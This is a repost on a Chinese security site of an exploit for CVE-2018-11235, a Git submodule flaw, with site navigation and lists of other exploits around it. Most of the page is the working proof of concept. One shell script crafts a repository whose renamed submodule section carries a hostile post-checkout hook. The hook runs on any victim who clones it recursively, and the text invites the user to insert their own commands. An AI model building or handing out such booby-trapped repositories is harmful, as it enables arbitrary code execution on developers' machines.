首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Git < 2.17.1 - Remote Code Execution
来源:jameelnabbo.com 作者:Nabbo 发布时间:2018-06-11  
# Exploit Title:  Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>
# CVE: CVE-2018-11235
 #Version:  <=2.17.1
# Tested on Kali Linux
 
 
P0C:
 
Create two files:
pwned.sh: the file which will contain our commands to be executed
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file
 
add the follwing to Pwned.sh:
#!/bin/sh
cat << EOF
 
#here we can put our lovely commands
Exploited! : $(ifconfig)
 
EOF
 
#--------
 
Add the follwing to commit.sh file:
#!/bin/sh
 
set -e
 
repo_dir="$PWD/repo"
#change it to any other Repo
repo_submodule='https://github.com/JameelNabbo/SmartWorm'
 
git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../pwned.sh modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”
 
 
——————
Solution:
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Edge Chakra - EntryS
·Zip-n-Go 4.9 - Buffer Overflow
·Sony Playstation 4 (PS4) 5.1 -
·CyberArk < 10 - Memory Disclos
·Procps-ng - Multiple Vulnerabi
·Microsoft Windows - UAC Protec
·Siemens SIMATIC S7-300 CPU - R
·Linux Kernel < 4.16.11 - 'ext4
·GNU Barcode 0.99 - Memory Leak
·Clone2GO Video converter 2.8.2
·GNU Barcode 0.99 - Buffer Over
·WebKit - not_number defineProp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved